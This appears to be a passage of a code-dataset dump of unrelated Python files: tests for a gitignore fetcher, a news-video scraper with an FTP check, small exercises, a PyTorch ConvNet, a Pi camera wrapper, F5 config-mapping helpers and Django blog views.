+{"seq_id":"463743118","text":"import pytest\n\nimport fetch_gitignore\n\nclass TestDirsExist:\n\n def test_dir_exists(self):\n fetch_gitignore.dirs_exist(['logs/'])\n\n def test_multiple_dirs_exist(self):\n fetch_gitignore.dirs_exist(['logs/', 'venv/'])\n\n def test_dir_doesnt_exist(self):\n with pytest.raises(fetch_gitignore.GitIgnoreDirectoryDoesntExistError) as e:\n fetch_gitignore.dirs_exist(['logs/', 'venv/', 'thisdirwillcausefailure/'])\n\n assert 'thisdirwillcausefailure' in str(e.value)\n assert 'logs' not in str(e.value)\n assert 'venv' not in str(e.value)\n\n\nclass TestGetGitIgnore:\n class MockResponse:\n def __init__(self):\n self.status_code = 200\n self.url = 'http://httpbin.org/get'\n self.headers = {'foo': 'bar'}\n\n @property\n def text(self):\n return \"test data\"\n\n def mock_get(self, url):\n return self.MockResponse()\n\n def test_get_gitignore_success_single(self, monkeypatch, tmp_path):\n d = tmp_path / \"sub\"\n d.mkdir()\n p = d / \".gitignore\"\n monkeypatch.setattr(fetch_gitignore.requests, 'get', self.mock_get)\n fetch_gitignore.get_gitingnore('http://thisisatest.com', [d])\n assert p.read_text() == \"test data\\n# VS Code\\n.vscode/\"\n assert len(list(tmp_path.iterdir())) == 1\n\n def test_get_gitignore_success_multi(self, monkeypatch, tmp_path):\n dirs = []\n files = []\n for index in range(3):\n d = tmp_path / str(index)\n d.mkdir()\n p = d / \".gitignore\"\n files.append(p)\n monkeypatch.setattr(fetch_gitignore.requests, 'get', self.mock_get)\n dirs.append(d)\n fetch_gitignore.get_gitingnore('http://thisisatest.com', dirs)\n for ignore in files:\n assert ignore.read_text() == \"test data\\n# VS Code\\n.vscode/\"\n assert len(list(tmp_path.iterdir())) == 3\n\n\n","sub_path":"fetch_gitignore_tests.py","file_name":"fetch_gitignore_tests.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"385520472","text":"#! python\n# -*- coding: utf-8 -*-\nimport re\nimport os\nimport pickle\nimport requests\nimport argparse\nfrom ftplib import FTP\nfrom time import sleep\nfrom random import choice\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom datetime import datetime, timedelta\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=True)\nparser.add_argument('-p', '--password', required=True)\nargv = parser.parse_args()\n\n\n############### All video source goes here ###############\nmp4_save_path = '' # mp4文件保存路径\nvideos_source = {}\nvideos_source['popnews'] = []\nvideos_source['pearvideo'] = []\nvideos_source['chinanews'] = []\nvideos_source['itouchtv'] = []\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=new', '最新']) # Pop News 最新\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=a', '港聞']) # Pop News 港闻\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=f', '娛樂']) # Pop News 娱乐\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=b', '國際']) # Pop News 国际\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=e', '兩岸']) # Pop News 两岸\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=l', '生活']) # Pop News 生活\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=m', '電影']) # Pop News 电影\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=c', '體育']) # Pop News 体育\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=d', '財經']) # Pop News 财经\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=s', '親子王']) # Pop News 亲子王\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=ppl', '名人導航']) # Pop News 名人导航\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=h', '地產']) # Pop News 地產\nvideos_source['pearvideo'].append('https://www.pearvideo.com/category_2') # 梨视频 世界\nvideos_source['chinanews'].append('https://www.chinanews.com/shipin/') # 中新网\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/', '推荐']) # 触电新闻 推荐\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/funny', '搞笑']) # 触电新闻 搞笑\n#videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/food', '美食']) # 触电新闻 美食\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/fashion', '时尚']) # 触电新闻 时尚\nvideos_source['itouchtv'].append(['https://www.itouchtv.cn/news/video', '视频']) # 触电新闻 视频\n\n############### All video sources go here ###############\n\n### 模拟浏览器 User-Agent\ndesktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']\n\n\n# 随机 浏览器 User-Agent\ndef random_headers():\n return {'User-Agent': choice(desktop_agents), 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n\n\n# 视频下载器\ndef video_downloader(file_path, file_name, download_link):\n supported_video_format = ['mp4']\n format_supported = False\n path = os.path.join(*[mp4_save_path, file_path, re.sub('\\?|\\|\\*|\\\"', '', file_name) + '.mp4'])\n for video_format in supported_video_format:\n if video_format in download_link:\n format_supported = True\n if not format_supported:\n print('视频格式不支持: %s' % download_link)\n return\n if os.path.exists(path):\n print('{} 已存在'.format(path))\n return\n req = requests.get(download_link)\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n with open(path, 'wb') as f:\n f.write(req.content)\n f.close()\n print(\"{} downloaded {}\".format(file_name, f.name))\n\n# 捉取触电新闻MP4链接\ndef itouchtv_video_handler():\n for source in videos_source['itouchtv']:\n driver.maximize_window()\n # driver.set_page_load_timeout(30)\n try:\n driver.get(source[0])\n except:\n continue\n windows_height = driver.execute_script(\"return document.body.clientHeight\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(2)\n while driver.execute_script(\"return document.body.clientHeight\") > windows_height:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight-50);\")\n windows_height = driver.execute_script(\"return document.body.clientHeight\")\n sleep(2)\n\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n videos_div = soup.findAll('div', {\"class\": \"pushList__pushItem___bgsfJ\"})\n for item in videos_div:\n video_sublink = item.find('a', {\"class\": \"pushList__pushItemBox___2MME6\"})['href']\n video_title = item.find('a', {\"class\": \"pushList__pushItemBox___2MME6\"})['title']\n print(video_sublink, video_title)\n driver.get('https://www.itouchtv.cn%s' % video_sublink)\n sleep(3)\n if re.search('src=\\\"(http.*?\\.mp4)', driver.page_source):\n video_link = re.search('src=\\\"(http.*?\\.mp4)', driver.page_source).group(1)\n print(video_title, video_link)\n video_downloader('itouchtv', video_title, video_link)\n\n\n# 捉取梨视频MP4链接\ndef pear_video_handler():\n for source in videos_source['pearvideo']:\n req = requests.get(source, headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n videos_li = soup.find_all('li', class_='categoryem')\n for video in videos_li:\n video_title = video.find('div', class_='vervideo-title').string\n video_sub_page = 'https://pearvideo.com/' + video.find('a').get('href')\n req = requests.get(video_sub_page, headers=random_headers())\n if re.search('http.*\\.mp4', html_decoder(req)):\n video_link = re.search('http.*\\.mp4', html_decoder(req)).group(0)\n print(video_title, video_sub_page, video_link)\n video_downloader('pearvideo', video_title, video_link)\n\n\n\ndef pop_news_handler(selen_webdriver):\n \"\"\"\n 捉取POPNEWS MP4链接\n :param selen_webdriver: selenium webdrver\n :return: list [视频链接, 视频标题, 视频分类]\n \"\"\"\n video_records = {}\n selen_webdriver.implicitly_wait(20)\n # driver.set_page_load_timeout(30)\n selen_webdriver.maximize_window()\n for source in videos_source['popnews']:\n req = requests.get(source[0], headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n # 类别页面出错handler 跳过\n try:\n videos_list = soup.find('div', id='catPlayListB').find_all('div', class_='trailer')\n for video in videos_list:\n video_sub_page = 'http://pop.stheadline.com/' + video.find('a').get('href')\n video_title = video.find('a').get('title')\n # req = requests.get(video_sub_page, headers=random_headers())\n try:\n selen_webdriver.get(video_sub_page)\n except:\n continue\n if re.search('http.*\\.mp4', selen_webdriver.page_source):\n video_link = re.search('http.*\\.mp4', selen_webdriver.page_source).group(0)\n print(video_title, video_sub_page, video_link)\n video_records[os.path.basename(video_link)] = [video_title, source[1]] # 视频链接, 视频标题, 视频分类\n except:\n pass\n selen_webdriver.close()\n return video_records\n\n\ndef popnews_ftp_comparor(selen_webdriver, debug_mode=False):\n \"\"\"\n :param selen_webdriver: selenium webdrver\n :param debug_mode:\n :type debug_mode: boolean default False\n True: load video_records from pickle file\n False: run pop_news_handler() to get video_records\n \"\"\"\n ftp_url = '203.80.0.177'\n user = argv.user\n passwd = argv.password\n today_date = (datetime.now() - timedelta(days=0)).strftime(\"%Y%m%d\") # 20180904\n\n if debug_mode:\n with open('test_records.pkl', 'rb') as f:\n video_records = pickle.load(f)\n f.close()\n else:\n video_records = pop_news_handler(selen_webdriver=selen_webdriver)\n # 保存 video_records 测试用途\n with open('test_records.pkl', 'wb') as f:\n pickle.dump(video_records, f)\n f.close()\n\n ftp = FTP(ftp_url)\n ftp.login(user, passwd)\n file_gen = ftp.mlsd('headline/%s' % today_date)\n ftp.dir('headline/%s' % today_date)\n csv_name = os.path.join(mp4_save_path, 'popnews%s.csv' % today_date)\n if os.path.exists(csv_name):\n os.remove(csv_name)\n\n videos_dict = {}\n for fg in file_gen:\n mp4_name = fg[0]\n if mp4_name in video_records:\n video_title = video_records[mp4_name][0]\n video_cat = video_records[mp4_name][1]\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n else:\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n video_title = ''\n video_cat = ''\n\n print(\"找到视频:{0} 标题:{1} 分类:{2}\".format(mp4_name, video_title, video_cat))\n if not videos_dict.get(video_cat, None): videos_dict[video_cat] = {}\n videos_dict[video_cat][mp4_name] = {\"video_title\": video_title}\n with open(csv_name, 'w', encoding='utf-8') as f:\n write_str = \"\"\n for cat, val in videos_dict.items():\n for video_mp4_name, video_val in val.items():\n write_str += '{0},{1},{2}\\n'.format(video_mp4_name,\n video_val['video_title'].replace(',', ' '),\n cat)\n f.write(write_str)\n f.close()\n\n\n# 捉取中新网MP4链接\ndef china_news_handler():\n for source in videos_source['chinanews']:\n req = requests.get(source, headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n short_videos_div = (soup.find(href='http://www.chinanews.com/shipin/m/duan/views.shtml')\n .find_next(class_='splist')\n .find_all(class_='splist_div'))\n\n for div in short_videos_div:\n video_title = div.find('p').string\n video_sub_page = 'http://www.chinanews.com' + div.find('a').get('href')\n req = requests.get(video_sub_page, headers=random_headers())\n if re.search('http.*\\.mp4', html_decoder(req)):\n video_link = re.search('http.*\\.mp4', html_decoder(req)).group(0)\n print(video_title, video_sub_page, video_link)\n video_downloader('chinanews', video_title.strip(), video_link)\n\n\n# html 中文内容解码\ndef html_decoder(req):\n if not ('utf-8' in req.apparent_encoding.lower() or 'utf-8' in req.encoding.lower()):\n return req.content.decode('gbk')\n else:\n return req.text\n\n\ndef main():\n for source in videos_source:\n if source == 'popnews':\n popnews_ftp_comparor(webdriver=driver)\n# if source == 'pearvideo':\n# pear_video_handler()\n# if source == 'chinanews':\n# china_news_handler()\n# if source == 'itouchtv':\n# itouchtv_video_handler()\n\n\n# 下载对应版本Edge 驱动 https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/\n# 放到此目录下\nif os.path.exists('MicrosoftWebDriver.exe'):\n driver = webdriver.Edge(executable_path='MicrosoftWebDriver.exe')\nelif os.path.exists('chromedriver.exe'):\n driver = webdriver.Chrome(executable_path='chromedriver.exe')\nelse:\n print('缺少 web driver')\n exit(1)\n\ntry:\n main()\n driver.close()\n driver.quit()\nexcept Exception as e:\n print(e)\n driver.close()\n driver.quit()\n","sub_path":"mp4_downloader.py","file_name":"mp4_downloader.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"269986496","text":"\"\"\"\r\nCe programme permet de converteir des Euros en Dollars après avoir\r\ndemandé à l'utilisateur de saisir le taux de change le plus récent\r\n\"\"\"\r\nimport os\r\na=float(input(\"entrer la valeur du taux e change €/$: \"))\r\ni=1\r\nwhile i<=16384:\r\n print(str(i)+\" euro(s) = \"+str(i*a)+\" dollar(s)\")\r\n i*=2 #multiplying i by 2\r\nos.system(\"pause\")\r\n","sub_path":"Swinnen_4.2.py","file_name":"Swinnen_4.2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"74957363","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(10**6)\n\nn, m = list(map(int, input().split()))\n\n\n# 2x+2y+2z=2n\n# 3x+3y+3z=3n\n# 4x+4y+4z=4n\n\n# 2x+3y+4z=m\n\n# x-z=3n-m\n# y+2z=m-2n\n# 2x+y=4n-m\n\n# y = m-2n-2z\n# x = 3n-m+z\n# z = z\n\ndef check(x, y, z):\n if x >= 0 and y >= 0 and z >= 0:\n return True\n else:\n return False\n\n\nfor z in range(0, 10**5+1):\n x = 3*n-m+z\n y = m-2*n-2*z\n z = z\n\n if check(x, y, z):\n print(x, y, z)\n exit()\n\nprint(-1, -1, -1)\n","sub_path":"abc006/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"171055219","text":"# architecture replicated from DoReFaNet code at\n# https://github.com/ppwwyyxx/tensorpack/blob/master/examples/DoReFa-Net\n\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nfrom activations import CAbs\nfrom util.reshapemodule import ReshapeBatch\n\n\nclass ConvNet8(nn.Module):\n def __init__(self, nonlin=nn.ReLU, use_batchnorm=True, use_dropout=True,\n input_shape=(3, 40, 40), no_step_last=False, separate_activations=True):\n super().__init__()\n self.use_batchnorm = use_batchnorm\n self.use_dropout = use_dropout\n self.separate_activations = separate_activations\n bias = not use_batchnorm\n\n if input_shape[1] == 40:\n pad0 = 0\n ks6 = 5\n elif input_shape[1] == 32:\n pad0 = 2\n ks6 = 4\n else:\n raise NotImplementedError('no other input sizes are currently supported')\n\n block0 = OrderedDict([\n # padding = valid\n ('conv0', nn.Conv2d(3, 48, kernel_size=5, padding=pad0, bias=True)), \n ('maxpool0', nn.MaxPool2d(2)), # padding = same\n ('nonlin1', nonlin()) # 18\n ])\n\n block1 = OrderedDict([\n # padding = same\n ('conv1', nn.Conv2d(48, 64, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm1', nn.BatchNorm2d(64, eps=1e-4)),\n ('nonlin1', nonlin()),\n ])\n\n block2 = OrderedDict([\n # padding = same\n ('conv2', nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm2', nn.BatchNorm2d(64, eps=1e-4)),\n ('maxpool1', nn.MaxPool2d(2)), # padding = same\n ('nonlin2', nonlin()), # 9\n ])\n\n block3 = OrderedDict([\n # padding = valid\n ('conv3', nn.Conv2d(64, 128, kernel_size=3, padding=0, bias=bias)), \n ('batchnorm3', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin3', nonlin()), # 7\n ])\n\n block4 = OrderedDict([\n # padding = same\n ('conv4', nn.Conv2d(128, 128, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm4', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin4', nonlin()),\n ])\n\n block5 = OrderedDict([\n # padding = valid\n ('conv5', nn.Conv2d(128, 128, kernel_size=3, padding=0, bias=bias)), \n ('batchnorm5', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin5', nonlin()), # 5\n ])\n\n block6 = OrderedDict([\n ('dropout', nn.Dropout2d()),\n # padding = valid\n ('conv6', nn.Conv2d(128, 512, kernel_size=ks6, padding=0, bias=bias)), \n ('batchnorm6', nn.BatchNorm2d(512, eps=1e-4)),\n ('nonlin6', nonlin() if not no_step_last else CAbs()),\n # ('nonlin6', nonlin() if not relu_last_layer else nn.ReLU()),\n ])\n\n block7 = OrderedDict([\n ('reshape_fc1', ReshapeBatch(-1)),\n ('fc1', nn.Linear(512, 10, bias=True))\n ])\n\n if not self.use_batchnorm:\n del block1['batchnorm1']\n del block2['batchnorm2']\n del block3['batchnorm3']\n del block4['batchnorm4']\n del block5['batchnorm5']\n del block6['batchnorm6']\n if not self.use_dropout:\n del block6['dropout']\n\n if self.separate_activations:\n self.all_modules = nn.ModuleList([\n nn.Sequential(block0),\n nn.Sequential(block1),\n nn.Sequential(block2),\n nn.Sequential(block3),\n nn.Sequential(block4),\n nn.Sequential(block5),\n nn.Sequential(block6),\n nn.Sequential(block7),\n ])\n self.all_activations = nn.ModuleList(\n [nonlin(), nonlin(), nonlin(), nonlin(), \n nonlin(), nonlin(), nonlin()])\n else:\n self.all_modules = nn.Sequential(OrderedDict([\n ('block0', nn.Sequential(block0)),\n ('block1', nn.Sequential(block1)),\n ('block2', nn.Sequential(block2)),\n ('block3', nn.Sequential(block3)),\n ('block4', nn.Sequential(block4)),\n ('block5', nn.Sequential(block5)),\n ('block6', nn.Sequential(block6)),\n ('block7', nn.Sequential(block7)),\n ]))\n\n def forward(self, x):\n if self.separate_activations:\n for i, module in enumerate(self.all_modules):\n if i == 0:\n y = module(x)\n else:\n y = module(y)\n if i != len(self.all_modules)-1:\n y = self.all_activations[i](y)\n else:\n y = self.all_modules(x)\n return y\n","sub_path":"code/models/convnet8.py","file_name":"convnet8.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"389645873","text":"from picamera import PiCamera\nfrom picamera.array import PiRGBArray\n\nclass Camera:\n\t__instance = None\n\tpiCamera = None\n\tisPreviewing = False\n\n\tdef takePhoto(self):\n\t\tprint(\"Taking photo\")\n\t\trawCapture = PiRGBArray(self.piCamera)\n\t\tself.piCamera.capture(rawCapture, format=\"bgr\")\n\t\treturn rawCapture.array\n\n\tdef togglePreview(self):\n\t\tprint(\"Toggling preview\")\n\n\t\tif self.isPreviewing:\n\t\t\tself.piCamera.stop_preview()\n\t\telse:\n\t\t\tself.piCamera.start_preview(fullscreen=False, window=(100, 20, 640, 480))\n\t\tself.isPreviewing = not self.isPreviewing\n\n\t@staticmethod\n\tdef getInstance():\n\t\t\"\"\" Static access method. \"\"\"\n\t\tif Camera.__instance == None:\n\t\t\tCamera()\n\t\treturn Camera.__instance\n\n\tdef __init__(self):\n\t\tprint(\"Initializing Camera\")\n\t\tif Camera.__instance != None:\n\t\t\tprint(\"Camera was already initialized, throwing exception\")\n\t\t\traise Exception(\"This class is a singleton!\")\n\t\telse:\n\t\t\tprint(\"Setting PiCamera wrapper\")\n\t\t\tself.piCamera = PiCamera()\n\t\t\tself.piCamera.rotation = 180\n\t\t\tCamera.__instance = self\n\n\n\n\n","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"568721026","text":"import socket\n#Port Mappings\ndef port_mappings(port):\n port = str(port)\n if port == '':\n mapped_port = '0'\n mapped_port_name = 'any'\n elif port == 'www':\n mapped_port = '80'\n mapped_port_name = 'http'\n elif port == 'https':\n mapped_port = '443'\n mapped_port_name = 'https'\n else:\n mapped_port = port\n mapped_port_name = port\n return (mapped_port, mapped_port_name)\n\n#DNS Mappings\ndef dns_mappings(ip_address):\n try:\n domain_lookup = True\n domain_name = socket.gethostbyaddr(ip_address)\n domain_split = domain_name[0].split('.')\n init_name = domain_split[0]\n except:\n domain_lookup = False\n init_name = None\n return (domain_lookup, init_name)\n#LB algorithm Mappings\ndef lb_algorithm_mappings(ace_lb_method):\n if ace_lb_method == \"leastconns\":\n lb_method = \"least-connections-member\"\n else:\n lb_method = \"round-robin\" \n return(lb_method)\n\n#Write Rules\ndef write_irule(rule_type, rule_method, rule_value, irule_pool_name, counter_outer_irule, counter_inner_irule, file_handle):\n if rule_type == \"http\" and rule_method == \"url\":\n #config_file = open(path_to_virtual_file, 'a')\n if counter_outer_irule == 0 and counter_inner_irule == 0:\n file_handle.write(\" if {$uri starts_with \\\"/\"+ rule_value.lower() +\"\\\"} {\\n\")\n file_handle.write(\" pool \" + irule_pool_name + \"\\n\")\n file_handle.write(\" }\\n\")\n else:\n file_handle.write(\" elseif {$uri starts_with \\\"/\"+ rule_value.lower() +\"\\\"} {\\n\")\n file_handle.write(\" pool \" + irule_pool_name + \"\\n\")\n file_handle.write(\" }\\n\")\n \n\n#Persistence Profile Mappings\n\ndef persistence_mappings(sticky_type, sticky_value):\n sticky_type = sticky_type.replace(' ', '')\n sticky_type = sticky_type.replace('\\n', '')\n sticky_type = sticky_type.rstrip()\n\n \n sticky_value = sticky_value.replace(' ', '')\n sticky_value = sticky_value.replace('\\n', '')\n sticky_value = sticky_value.rstrip()\n\n if sticky_type == \"ip-netmask\" and sticky_value == \"source\":\n persistence_profile = \"source_addr\"\n elif sticky_type == \"http-cookie\" and sticky_value.lower() == \"jsessionid\":\n persistence_profile = \"JSESSIONID\"\n elif sticky_type == \"http-cookie\":\n persistence_profile = \"cookie\"\n else:\n persistence_profile = \"source_addr\"\n return (persistence_profile, sticky_type)\n\n\n\n\n#Monitor Mappings\n\ndef probe_mappings(poolmember_monitor_name, config_file, dictionary, new_monitor_name):\n if poolmember_monitor_name in dictionary:\n (probe_type, probe_port, probe_method, probe_url, probe_status, probe_regex, probe_host) = dictionary[poolmember_monitor_name]\n if probe_type == \"http\" or probe_type == \"https\":\n config_file.write(\"ltm monitor \" + probe_type + \" \" + new_monitor_name +\" {\\n\")\n config_file.write(\" defaults-from \"+ probe_type + \"\\n\") \n if probe_port != '':\n config_file.write(\" destination *:\" + probe_port + \"\\n\")\n else:\n config_file.write(\" destination *:*\\n\")\n config_file.write(\" interval \" + \"10\" + \"\\n\")\n if probe_regex != '':\n config_file.write(\" recv \" + probe_regex + \"\\n\")\n else:\n if probe_status != '':\n config_file.write(\" recv \" + \"\\\"HTTP/1\\\\.(0|1) (2|3)\\\"\\n\")\n\n if probe_host == '':\n probe_host = \"localhost\"\n probe_method = probe_method.upper()\n if probe_url != '':\n config_file.write(\" send \" + \"\\\"\" + probe_method + \" \" + probe_url + \" HTTP/1.1\\\\r\\\\nHost: \" + probe_host + \"\\\\r\\\\nConnection: Close\\\\r\\\\n\\\\r\\\\n\\n\")\n else:\n config_file.write(\" send \" + \"\\\"\" + \"GET\" + \" \" + \"\\/\" + \" HTTP/1.1\\\\r\\\\nHost: \" + probe_host + \"\\\\r\\\\nConnection: Close\\\\r\\\\n\\\\r\\\\n\\n\")\n config_file.write(\" time-until-up 0\\n\")\n config_file.write(\" timeout 31\\n\")\n config_file.write(\"}\\n\")\n\n elif probe_type == \"tcp\" and probe_port !=\"\":\n config_file.write(\"ltm monitor tcp \" + new_monitor_name +\"{\\n\")\n config_file.write(\" defaults-from tcp\\n\")\n config_file.write(\" destination *:\" + probe_port +\"\\n\")\n config_file.write(\" interval \" + \"10\" + \"\\n\")\n config_file.write(\" time-until-up 0\\n\")\n config_file.write(\" timeout 31\\n\")\n config_file.write(\"}\\n\")\n\n elif probe_type == \"tcp\" and probe_port ==\"\":\n new_monitor_name = \"tcp\"\n\n else:\n new_monitor_name = \"gateway-icmp\"\n \n \n \n else:\n new_monitor_name = \"gateway-icmp\"\n\n return (new_monitor_name)\n \n\n \n","sub_path":"parser_functions.py","file_name":"parser_functions.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"78970895","text":"#from django.core.mail import send_mail \nfrom django.shortcuts import render,get_object_or_404, redirect\nfrom .models import Post,Categories,Comment\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import CommentForm\n\n# Create your views here.\n\ndef index(request):\n imagen = \"/static/img/sidebar.jpg\"\n posts_list = Post.objects.filter(publicado=True).select_related('autor').order_by('-fecha_publicacion')\n categories = Categories.objects.all()\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page',1)\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n posts = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n posts = paginator.page(paginator.num_pages)\n\n\n\n return render(request,'blog/index.html',{'image':imagen,'posts':posts, 'categories':categories})\n\n\n\ndef post(request,slug):\n\n post = get_object_or_404(Post,slug=slug)\n print('post: '+post.titulo)\n related = Post.objects.filter(Q(categoria=post.categoria) | Q(autor=post.autor), ~Q(titulo=post.titulo))[:3]\n return render(request,'blog/post/post.html',{'post':post,'related':related})\n\ndef add_comment(request, slug):\n\tpost = get_object_or_404(Post, slug=slug)\n\tprint(request.POST)\n\tif request.method == 'POST':\n\t\treturn JsonResponse({\"prueba\": request.POST.get(\"text\")})\n\n#def add_comment(request, slug):\n# post = get_object_or_404(Post, slug=slug)\n# if request.method == 'POST':\n# form =CommentForm(request.POST)\n# if form.is_valid():\n# comment = form.save(commit=False)\n# comment.post = post\n# comment.save()\n# return redirect('blog:post', slug=post.slug)\n# else:\n# form =CommentForm()\n# template = 'blog/post/add_comment.html'\n# context = {'form': form}\n# return render(request, template, context)\n\n #def contactos(request): \n # errors = [] \n # if request.method == 'POST': \n # if not request.POST.get('asunto', ''): \n # errors.append('Por favor introduce el asunto.') \n # if not request.POST.get('mensaje', ''): \n # errors.append('Por favor introduce un mensaje.') \n # if request.POST.get('email') and '@' not in request.POST['email']: \n # errors.append('Por favor introduce una direccion de email valida.') \n # if not errors: \n # send_mail( request.POST['asunto'], \n # request.POST['mensaje'], \n # request.POST.get('email', 'noreply@example.com'), \n # ['siteowner@example.com'], ) \n # return HttpResponseRedirect('/contactos/gracias/') \n # return render(request, 'formulariocontactos.html', {'errors': errors}) \n\n#13/11/2018 agregado este comando primera parte\n#def categories(request, idcategory):\n# categories = Categories.objects.get(id=idcategories)\n# posts = categories.post_set.order_by(\"-creation_date\")\n\n# return render_to_response(\n# \"home.html\",\n# {\n# \"posts\":posts,\n# },\n# )\n\n#def categories(request):\n# categories = Categories.objects.all()\n# return render(request, 'blog/categorias/index.html',{'categories':categories})\n\n#def categories(request, pk):\n# categories = get_object_or_404(Categories, pk=pk)\n# return render(request, 'blog/base.html',{'categories':categories})\ndef categories(request, slug):\n postt = Post.objects.all()\n slugg = slug\n return render(request,'blog/categorias/cate.html',{'postt':postt, 'slugg': slugg})\n","sub_path":"techlinx/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"223515738","text":"# coding=utf-8\n\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nTHEMES\nTheme class and predefined themes.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2020 Pablo Pizarro R. @ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, 